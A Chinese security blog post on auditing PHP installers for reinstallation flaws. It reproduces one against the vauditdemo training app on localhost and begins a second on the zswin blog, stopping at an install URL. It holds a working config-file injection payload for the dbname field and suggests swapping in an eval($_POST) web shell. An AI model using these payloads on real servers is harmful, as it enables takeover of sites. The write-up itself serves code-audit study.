<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
<title>PHP代码审计之重装漏洞 - Threezh1&#39;s blog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">




<meta name="description" content="Share learn & Share life.">



<meta name="keywords" content="Threezh1">



    <meta name="description" content="&amp;#x91CD;&amp;#x88C5;&amp;#x6F0F;&amp;#x6D1E;&amp;#x6839;&amp;#x636E;&amp;#x5927;&amp;#x4F6C;&amp;#x4EEC;&amp;#x7684;&amp;#x603B;&amp;#x7ED3;&amp;#xFF0C;&amp;#x91CD;&amp;#x88C5;&amp;#x6F0F;&amp;#x6D1E;&amp;#x53EF;&amp;#x4EE5;&amp;#x4EE5;&amp;#x4E0B;&amp;#x51E0;&amp;#x79CD;&amp;#x7C7B;&amp;#x578B;">
<meta name="keywords" content="PHP,代码审计,重装漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP代码审计之重装漏洞">
<meta property="og:url" content="http://yoursite.com/2019/05/18/PHP代码审计之重装漏洞/index.html">
<meta property="og:site_name" content="Threezh1&#39;s blog">
<meta property="og:description" content="&amp;#x91CD;&amp;#x88C5;&amp;#x6F0F;&amp;#x6D1E;&amp;#x6839;&amp;#x636E;&amp;#x5927;&amp;#x4F6C;&amp;#x4EEC;&amp;#x7684;&amp;#x603B;&amp;#x7ED3;&amp;#xFF0C;&amp;#x91CD;&amp;#x88C5;&amp;#x6F0F;&amp;#x6D1E;&amp;#x53EF;&amp;#x4EE5;&amp;#x4EE5;&amp;#x4E0B;&amp;#x51E0;&amp;#x79CD;&amp;#x7C7B;&amp;#x578B;">
<meta property="og:locale" content="Chinese">
<meta property="og:image" content="https://i.loli.net/2019/05/18/5ce001381792a52779.jpg">
<meta property="og:image" content="https://i.loli.net/2019/05/18/5ce001360367555804.jpg">
<meta property="og:image" content="https://i.loli.net/2019/05/19/5ce0b569747fd26998.jpg">
<meta property="og:image" content="https://i.loli.net/2019/05/19/5ce0b569337d168459.jpg">
<meta property="og:image" content="https://i.loli.net/2019/05/19/5ce0b56abedb011742.jpg">
<meta property="og:updated_time" content="2020-02-12T14:05:34.531Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PHP代码审计之重装漏洞">
<meta name="twitter:description" content="&amp;#x91CD;&amp;#x88C5;&amp;#x6F0F;&amp;#x6D1E;&amp;#x6839;&amp;#x636E;&amp;#x5927;&amp;#x4F6C;&amp;#x4EEC;&amp;#x7684;&amp;#x603B;&amp;#x7ED3;&amp;#xFF0C;&amp;#x91CD;&amp;#x88C5;&amp;#x6F0F;&amp;#x6D1E;&amp;#x53EF;&amp;#x4EE5;&amp;#x4EE5;&amp;#x4E0B;&amp;#x51E0;&amp;#x79CD;&amp;#x7C7B;&amp;#x578B;">
<meta name="twitter:image" content="https://i.loli.net/2019/05/18/5ce001381792a52779.jpg">





<link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css">

<link rel="stylesheet" href="/css/style.css">

<script defer src="//use.fontawesome.com/releases/v5.0.8/js/all.js"></script>


    
    
    
    
    
    
    
    
    


</head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt height="28">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item " href="/archives">归档</a>
            
            <a class="navbar-item " href="/Projects">项目</a>
            
            <a class="navbar-item " href="/Life">生活</a>
            
            <a class="navbar-item " href="/Photography">摄影</a>
            
            <a class="navbar-item " href="/about">关于</a>
            
            <a class="navbar-item " href="http://121.36.32.184/">Threeday</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            <a class="navbar-item search" title="Search" href="javascript:;">
                <i class="fas fa-search"></i>
            </a>
            
            
            <div class="navbar-item is-hoverable has-dropdown is-hidden-mobile is-hidden-tablet-only toc">
                <a class="navbar-item" title="Table of Contents">
                    <i class="fa fa-list"></i>
                </a>
                <div class="navbar-dropdown is-right">
                    
                    
                    
                    
                    <a class="navbar-item" href="#重装漏洞">1&nbsp;&nbsp;<b>重装漏洞</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#复现-vauditdemo重装漏洞">2&nbsp;&nbsp;<b>复现 vauditdemo重装漏洞</b></a>
                    
                    
                    
                    <a class="navbar-item" href="#漏洞复现">2.1&nbsp;&nbsp;漏洞复现</a>
                    
                    
                    
                    <a class="navbar-item" href="#代码分析">2.2&nbsp;&nbsp;代码分析</a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#zswin博客重装漏洞-getshell-复现">3&nbsp;&nbsp;<b>zswin博客重装漏洞 getshell 复现</b></a>
                    
                    
                    
                    <a class="navbar-item" href="#漏洞复现-1">3.1&nbsp;&nbsp;漏洞复现</a>
                    
                    
                    
                    <a class="navbar-item" href="#代码分析-1">3.2&nbsp;&nbsp;代码分析</a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#遇到的问题">4&nbsp;&nbsp;<b>遇到的问题</b></a>
                    
                </div>
            </div>
            
            
            <a class="navbar-item" title="GitHub" href="https://github.com/Threezh1">
                
                <i class="fab fa-github"></i>
                
            </a>
               
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            PHP代码审计之重装漏洞
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            <time datetime="2019-05-17T16:00:00.000Z" itemprop="datePublished">May 18 2019</time>
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/技术文章/">技术文章</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            15 minutes read (About 2182 words)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <h2 id="&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;"><a href="#&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;" class="headerlink" title="&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;"></a>&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;</h2><p>&#x6839;&#x636E;&#x5927;&#x4F6C;&#x4EEC;&#x7684;&#x603B;&#x7ED3;&#xFF0C;&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;&#x53EF;&#x4EE5;&#x4EE5;&#x4E0B;&#x51E0;&#x79CD;&#x7C7B;&#x578B;&#xFF1A;</p>
<ol>
<li><p>&#x81EA;&#x52A8;&#x5220;&#x9664;&#x8FD9;&#x4E2A;&#x5B89;&#x88C5;&#x6587;&#x4EF6;</p>
<p> &#x901A;&#x8FC7;&#x751F;&#x6210;&#x4E00;&#x4E2A;lock&#x6587;&#x4EF6;&#x6765;&#x5224;&#x65AD;&#x7A0B;&#x5E8F;&#x662F;&#x5426;&#x5B89;&#x88C5;&#x8FC7;</p>
</li>
<li><p>&#x6839;&#x672C;&#x65E0;&#x9A8C;&#x8BC1;</p>
<p> &#x5B89;&#x88C5;&#x5B8C;&#x6210;&#x540E;&#x4E0D;&#x4F1A;&#x81EA;&#x52A8;&#x5220;&#x9664;&#x6587;&#x4EF6;&#xFF0C;&#x53C8;&#x4E0D;&#x4F1A;&#x751F;&#x6210;lock&#x5224;&#x65AD;&#x662F;&#x5426;&#x5B89;&#x88C5;&#x8FC7;</p>
<a id="more"></a></li>
<li><p>&#x5B89;&#x88C5;file</p>
<p> &#x76F4;&#x63A5;&#x7528;GET&#x63D0;&#x4EA4;step&#x7ED5;&#x8FC7;&#xFF0C;&#x76F4;&#x63A5;&#x8FDB;&#x5165;&#x4E0B;&#x4E00;&#x6B65;</p>
</li>
<li><p>&#x53D8;&#x91CF;&#x8986;&#x76D6;&#x5BFC;&#x81F4;&#x91CD;&#x88C5;</p>
<p> &#x53EF;&#x4EE5;GET,POST,COOKIE &#x4EFB;&#x610F;&#x63D0;&#x4EA4;&#x4E00;&#x4E2A;&#x53D8;&#x91CF;&#x540D;$insLockfile,&#x7ED9;&#x5176;&#x8D4B;&#x7A7A;&#x503C;&#xFF0C;&#x8986;&#x76D6;&#x6389;$insLockfile,&#x4ECE;&#x800C;&#x8BA9;file_exists&#x4E3A;false&#x5C31;&#x4E0D;&#x4F1A;&#x9000;&#x51FA;</p>
</li>
<li><p>&#x5224;&#x65AD;lock&#x540E;&#xFF0C;&#x65E0;exit</p>
<p> &#x5224;&#x65AD;&#x662F;&#x5426;&#x5B58;&#x5728;lock&#x6587;&#x4EF6;&#xFF0C;&#x5982;&#x679C;&#x5B58;&#x5728;lock&#x6587;&#x4EF6;&#xFF0C;&#x5C31;&#x4F1A;header&#x5230;index.php,&#x4F46;&#x662F;header&#x540E;&#x5E76;&#x6CA1;&#x6709;exit&#xFF0C;&#x6240;&#x4EE5; &#x5E76;&#x4E0D;&#x4F1A;&#x9000;&#x51FA;&#xFF0C;&#x7C7B;&#x4F3C;&#x7684;&#x8FD8;&#x6709;javascript&#x5F39;&#x4E2A;&#x6846;</p>
</li>
<li><p>&#x89E3;&#x6790;&#x6F0F;&#x6D1E;</p>
<p> &#x5728;&#x5B89;&#x88C5;&#x5B8C;&#x6210;&#x540E;&#x4F1A;&#x5C06;install.php &#x91CD;&#x547D;&#x540D;&#x4E3A;index.php.bak,&#x4F46;&#x662F;&#x7531;&#x4E8E;Apache&#x7684;&#x89E3;&#x6790;&#x6F0F;&#x6D1E;&#xFF1A;&#x5982;&#x679C;&#x65E0;&#x6CD5;&#x8BC6;&#x522B;&#x5230;&#x6700;&#x540E;&#x4E00;&#x4E2A;&#x540E;&#x7F00;&#x7684;&#x8BDD;&#xFF0C;&#x5C31;&#x4F1A;&#x5411;&#x4E0A;&#x89E3;&#x6790;&#xFF0C;&#x90A3;&#x4E48;&#x5C31;&#x53C8;&#x53D8;&#x6210;&#x4E86;php&#x4E86;&#xFF0C;&#x7136;&#x540E;&#x7ED3;&#x5408;&#x5B89;&#x88C5;&#x65F6;&#x7684;&#x53D8;&#x91CF;&#x8986;&#x76D6;&#x53C8;&#x6210;&#x91CD;&#x88C5;&#x4E86;&#x3002;</p>
</li>
<li><p>&#x6EE1;&#x8DB3;&#x4E00;&#x4E9B;&#x6761;&#x4EF6;&#x4E0D;&#x4F1A;&#x9000;&#x51FA;&#x7684;</p>
</li>
</ol>
<p>&#x8FD9;&#x6B21;&#x590D;&#x73B0;&#x7684;&#x4E24;&#x4E2A;&#x6F0F;&#x6D1E;&#xFF0C;&#x90FD;&#x5C5E;&#x4E8E;&#x7B2C;&#x4E94;&#x7C7B;&#x3002;&#x5F53;&#x9875;&#x9762;&#x8DF3;&#x8F6C;&#x5230;&#x4E3B;&#x9875;&#x4E4B;&#x540E;&#xFF0C;&#x539F;&#x6765;&#x7684;php&#x8FDB;&#x7A0B;&#x4F9D;&#x7136;&#x5B58;&#x5728;&#xFF0C;&#x5BFC;&#x81F4;&#x53EF;&#x4EE5;&#x91CD;&#x88C5;&#xFF0C;&#x800C;&#x5F53;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x6CA1;&#x6709;&#x7ECF;&#x8FC7;&#x8FC7;&#x6EE4;&#x800C;&#x88AB;&#x76F4;&#x63A5;&#x5199;&#x5165;&#x4E86;&#x6587;&#x4EF6;&#x5F53;&#x4E2D;&#xFF0C;&#x5C31;&#x53EF;&#x80FD;&#x4F1A;&#x5BFC;&#x81F4;getshell&#x3002;&#x5BFB;&#x627E;&#x6B64;&#x7C7B;&#x6F0F;&#x6D1E;&#x5E94;&#x8BE5;&#x5C1D;&#x8BD5;&#x53BB;&#x8DDF;&#x8E2A;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x7684;&#x6700;&#x7EC8;&#x53BB;&#x5904;&#xFF0C;&#x5E76;&#x68C0;&#x67E5;&#x662F;&#x5426;&#x6709;&#x8FC7;&#x6EE4;&#x3002;&#x901A;&#x8FC7;&#x6784;&#x9020;&#x95ED;&#x5408;&#x8BED;&#x53E5;&#x5229;&#x7528;&#x6F0F;&#x6D1E;&#x3002;</p>
<h2 id="&#x590D;&#x73B0;-vauditdemo&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;"><a href="#&#x590D;&#x73B0;-vauditdemo&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;" class="headerlink" title="&#x590D;&#x73B0; vauditdemo&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;"></a>&#x590D;&#x73B0; vauditdemo&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;</h2><h3 id="&#x6F0F;&#x6D1E;&#x590D;&#x73B0;"><a href="#&#x6F0F;&#x6D1E;&#x590D;&#x73B0;" class="headerlink" title="&#x6F0F;&#x6D1E;&#x590D;&#x73B0;"></a>&#x6F0F;&#x6D1E;&#x590D;&#x73B0;</h3><p>&#x8BBF;&#x95EE; <a href="http://127.0.0.1/install/install.php" target="_blank" rel="noopener">http://127.0.0.1/install/install.php</a></p>
<p>&#x63D0;&#x4EA4;&#x6570;&#x636E;&#x5E93;&#x4FE1;&#x606F;&#xFF0C;&#x7528;brupsuite&#x6293;&#x5305;&#x3002;(&#x4E3A;&#x4E86;&#x4FBF;&#x4E8E;&#x6F14;&#x793A;&#xFF0C;&#x6211;&#x5C06;header()&#x8BED;&#x53E5;&#x6CE8;&#x91CA;&#x4E86;)</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST /install/install.php HTTP/1.1</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: http://127.0.0.1/install/install.php</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 84</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=jfjge50g22ieqm7ib5ia1quf73</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">dbhost=localhost&amp;dbuser=root&amp;dbpass=root&amp;dbname=vauditdemo&amp;Submit=%E5%AE%89%E8%A3%9D</span><br></pre></td></tr></table></figure>

<p>&#x5C06;dbname&#x4FEE;&#x6539;&#x4E3A;&#xFF1A;</p>
<pre><code>testdb;-- -&quot;;phpinfo();//
</code></pre><p>&#x63D0;&#x4EA4;&#x3002;</p>
<p><img src="https://i.loli.net/2019/05/18/5ce001381792a52779.jpg" alt="1_install_success.jpg"></p>
<p>&#x8DF3;&#x8F6C;&#x5230;index&#x4E4B;&#x540E;&#x53EF;&#x4EE5;&#x770B;&#x5230;phpinfo()&#x4FE1;&#x606F;</p>
<p><img src="https://i.loli.net/2019/05/18/5ce001360367555804.jpg" alt="1_phpinfo.jpg"></p>
<p>&#x590D;&#x73B0;&#x6210;&#x529F;</p>
<h3 id="&#x4EE3;&#x7801;&#x5206;&#x6790;"><a href="#&#x4EE3;&#x7801;&#x5206;&#x6790;" class="headerlink" title="&#x4EE3;&#x7801;&#x5206;&#x6790;"></a>&#x4EE3;&#x7801;&#x5206;&#x6790;</h3><p>&#x5E73;&#x53F0;&#x7684;install.php&#x5B89;&#x88C5;&#x9875;&#x9762;, &#x5B89;&#x88C5;&#x4E4B;&#x524D;&#x4F1A;&#x6709;&#x4E00;&#x6BB5;&#x9A8C;&#x8BC1;&#x662F;&#x5426;&#x5DF2;&#x7ECF;&#x5B89;&#x88C5;&#x7684;&#x5224;&#x65AD;&#x8BED;&#x53E5;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">if</span> ( file_exists($_SERVER[<span class="hljs-string">&quot;DOCUMENT_ROOT&quot;</span>].<span class="hljs-string">&apos;/sys/install.lock&apos;</span>) ) {</span><br><span class="line">	header( <span class="hljs-string">&quot;Location: ../index.php&quot;</span> );</span><br><span class="line">}</span><br></pre></td></tr></table></figure>

<p>&#x5224;&#x65AD;&#x5B89;&#x88C5;&#x751F;&#x6210;&#x7684;lock&#x6587;&#x4EF6;&#x662F;&#x5426;&#x5B58;&#x5728;&#xFF0C;&#x5982;&#x679C;&#x5B58;&#x5728;&#xFF0C;&#x5C31;&#x91CD;&#x5B9A;&#x5411;&#x5230;index.php</p>
<p>&#x4F46;&#x662F;&#x8FD9;&#x91CC;&#x5B58;&#x5728;&#x4E00;&#x4E2A;&#x9519;&#x8BEF;&#xFF0C;&#x5F53;&#x9875;&#x9762;&#x91CD;&#x5B9A;&#x5411;&#x5230;index&#x4E4B;&#x540E;&#xFF0C;&#x5E76;&#x6CA1;&#x6709;&#x6267;&#x884C;exit&#x8BED;&#x53E5;&#x6765;&#x7ED3;&#x675F;&#x8FDB;&#x7A0B;&#xFF0C;&#x6240;&#x4EE5;install.php&#x7684;&#x8FDB;&#x7A0B;&#x4E00;&#x76F4;&#x5B58;&#x5728;&#x3002;&#x8FD9;&#x65F6;&#x5982;&#x679C;&#x7528;brupsuite&#x6293;&#x5305;&#xFF0C;&#x63D0;&#x4EA4;&#x7684;&#x6570;&#x636E;&#x4F1A;&#x88AB;&#x5224;&#x65AD;&#x8BED;&#x53E5;&#x4E4B;&#x540E;&#x7684;&#x4EE3;&#x7801;&#x6240;&#x6267;&#x884C;&#xFF0C;&#x5C31;&#x4F1A;&#x5BFC;&#x81F4;&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;&#x3002;</p>
<p>&#x5224;&#x65AD;&#x8BED;&#x53E5;&#x540E;&#xFF0C;&#x83B7;&#x53D6;&#x4E86;&#x4E00;&#x4E9B;&#x73AF;&#x5883;&#x4FE1;&#x606F;&#x4E4B;&#x540E;&#x5C31;&#x901A;&#x8FC7;POST&#x65B9;&#x6CD5;&#x83B7;&#x53D6;&#x6570;&#x636E;&#x5E93;&#x7684;&#x4FE1;&#x606F;&#x3002;</p>
<p>(&#x4EE3;&#x7801;&#x7ECF;&#x8FC7;&#x7701;&#x7565;)</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">if</span> ( $_POST ) {</span><br><span class="line"></span><br><span class="line">	...</span><br><span class="line"></span><br><span class="line">	$dbhost = $_POST[<span class="hljs-string">&quot;dbhost&quot;</span>];</span><br><span class="line">	$dbuser = $_POST[<span class="hljs-string">&quot;dbuser&quot;</span>];</span><br><span class="line">	$dbpass = $_POST[<span class="hljs-string">&quot;dbpass&quot;</span>];</span><br><span class="line">	$dbname = $_POST[<span class="hljs-string">&quot;dbname&quot;</span>];</span><br><span class="line"></span><br><span class="line">	...</span><br><span class="line"></span><br><span class="line">	mysql_query( <span class="hljs-string">&quot;CREATE DATABASE $dbname&quot;</span>, $con ) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span> ( mysql_error() );</span><br><span class="line"></span><br><span class="line">	$str_tmp=<span class="hljs-string">&quot;&lt;?php\r\n&quot;</span>;</span><br><span class="line">	$str_end=<span class="hljs-string">&quot;?&gt;&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;error_reporting(0);\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;if (!file_exists(\$_SERVER[\&quot;DOCUMENT_ROOT\&quot;].&apos;/sys/install.lock&apos;)){\r\n\theader(\&quot;Location: /install/install.php\&quot;);\r\nexit;\r\n}\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;include_once(&apos;../sys/lib.php&apos;);\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\$host=\&quot;$dbhost\&quot;; \r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\$username=\&quot;$dbuser\&quot;; \r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\$password=\&quot;$dbpass\&quot;; \r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\$database=\&quot;$dbname\&quot;; \r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\$conn = mysql_connect(\$host,\$username,\$password);\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;mysql_query(&apos;set names utf8&apos;,\$conn);\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;mysql_select_db(\$database, \$conn) or die(mysql_error());\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;if (!\$conn)\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;{\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\tdie(&apos;Could not connect: &apos; . mysql_error());\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\texit;\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;}\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;session_start();\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=<span class="hljs-string">&quot;\r\n&quot;</span>;</span><br><span class="line">	$str_tmp.=$str_end;</span><br><span class="line"></span><br><span class="line">	$fp=fopen( <span class="hljs-string">&quot;../sys/config.php&quot;</span>, <span class="hljs-string">&quot;w&quot;</span> );</span><br><span class="line">	fwrite( $fp, $str_tmp );</span><br><span class="line">	fclose( $fp );</span><br></pre></td></tr></table></figure>

<p>&#x53EF;&#x4EE5;&#x770B;&#x5230;&#xFF0C;&#x9875;&#x9762;&#x901A;&#x8FC7;&#x6240;&#x63D0;&#x4EA4;&#x7684;dbhost, dbuser, dbpass, dbname&#x6765;&#x83B7;&#x53D6;&#x6570;&#x636E;&#x5E93;&#x57FA;&#x672C;&#x4FE1;&#x606F;&#x3002;</p>
<p>&#x5728;&#x5224;&#x65AD;&#x6570;&#x636E;&#x5E93;&#x4FE1;&#x606F;&#x662F;&#x5426;&#x7B26;&#x5408;&#x5B89;&#x88C5;&#x6761;&#x4EF6;&#x4E4B;&#x540E;&#xFF0C;&#x9875;&#x9762;&#x5C06;&#x4E00;&#x6BB5;&#x5224;&#x65AD;&#x662F;&#x5426;&#x5DF2;&#x7ECF;&#x5B89;&#x88C5;&#x7684;php&#x811A;&#x672C;&#x5199;&#x5165;&#x5230;config.php&#x91CC;&#x3002;</p>
<p>&#x95EE;&#x9898;&#x51FA;&#x5728;&#x5176;&#x4E2D;&#x7684;&#x4E00;&#x6761;&#x8BED;&#x53E5;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$str_tmp.=<span class="hljs-string">&quot;\$database=\&quot;$dbname\&quot;; \r\n&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>&#x53EF;&#x77E5;&#xFF0C;dbname&#x662F;&#x53EF;&#x63A7;&#x7684;&#x3002;</p>
<p>&#x5F53;&#x6211;&#x4EEC;&#x5C06;dbname&#x8BBE;&#x7F6E;&#x4E3A;&#xFF1A;</p>
<pre><code>testdb;-- -&quot;;phpinfo();//

-- -     &#x662F;&#x4E3A;&#x4E86;&#x6CE8;&#x91CA;&#x6389;&#x540E;&#x9762;&#x7684;sql&#x8BED;&#x53E5;
&quot;;        &#x95ED;&#x5408;php&#x8BED;&#x53E5;
//        &#x6CE8;&#x91CA;&#x6389;&#x540E;&#x9762;&#x7684;php&#x8BED;&#x53E5;
</code></pre><p>config.php&#x91CC;&#x7684;&#x8BED;&#x53E5;&#x5C31;&#x4F1A;&#x53D8;&#x6210;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$database=<span class="hljs-string">&quot;testdb; -- -&quot;</span>; phpinfo();<span class="hljs-comment">//&quot;;</span></span><br></pre></td></tr></table></figure>

<p>&#x4E5F;&#x5C31;&#x4F1A;&#x6267;&#x884C;phpinfo(), &#x5F53;&#x6211;&#x4EEC;&#x628A;phpinfo()&#x4FEE;&#x6539;&#x4E3A;&#xFF1A;<code>eval($_POST[&apos;abc&apos;])</code>&#x5C31;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;getshell&#xFF1B;</p>
<h2 id="zswin&#x535A;&#x5BA2;&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;-getshell-&#x590D;&#x73B0;"><a href="#zswin&#x535A;&#x5BA2;&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;-getshell-&#x590D;&#x73B0;" class="headerlink" title="zswin&#x535A;&#x5BA2;&#x91CD;&#x88C5;&#x6F0F;&#x6D1E; getshell &#x590D;&#x73B0;"></a>zswin&#x535A;&#x5BA2;&#x91CD;&#x88C5;&#x6F0F;&#x6D1E; getshell &#x590D;&#x73B0;</h2><p>&#x5728;&#x767E;&#x5EA6;&#x4E0A;&#x76F4;&#x63A5;&#x641C;&#x5230;&#x7684;&#x4E00;&#x4E2A;&#x91CD;&#x88C5;&#x6F0F;&#x6D1E;&#xFF0C;&#x535A;&#x5BA2;&#x7CFB;&#x7EDF;&#x6709;&#x70B9;&#x8001;&#x4E86;&#xFF0C;&#x4F46;&#x662F;&#x62FF;&#x6765;&#x5B66;&#x4E60;&#x8FD8;&#x662F;&#x4E0D;&#x9519;&#x7684;&#x3002;</p>
<p>&#x53C2;&#x8003;&#xFF1A;<a href="https://shuimugan.com/bug/view?bug_no=119025" target="_blank" rel="noopener">https://shuimugan.com/bug/view?bug_no=119025</a></p>
<h3 id="&#x6F0F;&#x6D1E;&#x590D;&#x73B0;-1"><a href="#&#x6F0F;&#x6D1E;&#x590D;&#x73B0;-1" class="headerlink" title="&#x6F0F;&#x6D1E;&#x590D;&#x73B0;"></a>&#x6F0F;&#x6D1E;&#x590D;&#x73B0;</h3><p>&#x5728;&#x5DF2;&#x7ECF;&#x5B89;&#x88C5;&#x597D;&#x7684;&#x535A;&#x5BA2;&#xFF0C;&#x76F4;&#x63A5;&#x8BBF;&#x95EE;&#xFF1A;</p>
<p><a href="http://127.0.0.1/zwin/install.php?m=install&amp;c=index&amp;a=setconf" target="_blank" rel="noopener">http://127.0.0.1/zwin/install.php?m=install&amp;c=index&amp;a=setconf</a></p>
